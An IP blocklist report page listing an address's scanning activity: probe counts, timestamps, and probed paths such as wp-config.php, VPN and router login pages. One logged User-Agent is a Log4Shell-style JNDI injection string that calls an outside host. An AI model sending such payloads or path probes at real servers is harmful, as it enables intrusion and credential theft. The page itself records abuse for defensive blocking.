abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 65
- Unique targets hit
- 5
- Unique paths probed
- 1,196
- Detection count
- 19
- First seen
- 2026-07-09 14:18:02 UTC
- Last seen
- 2026-07-09 14:29:37 UTC
- Block expires
- 2026-07-10 15:19:54 UTC
Sample paths probed
- /style.php
- /geoserver/wms
- /index.php
- /vpn/index.html
- /ui/login.action
- /frontend.php
- /installer.php
- /api/installer/info
- /header.php
- /logon/LogonPoint/tmindex.html
- /
- /functions.php
- /controller.php
- /ini.php
- /wp-config.php
- /main.php
- /cgi-bin/luci/;stok=/login?form=get_firmware_info
- /admin.php
- /config.php
- /login.html
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
- Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:124.0) Gecko/20110111 Firefox/124.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0
- Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
- ${jndi:nds://194.138.14.53:33497/QUALYSTEST}
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.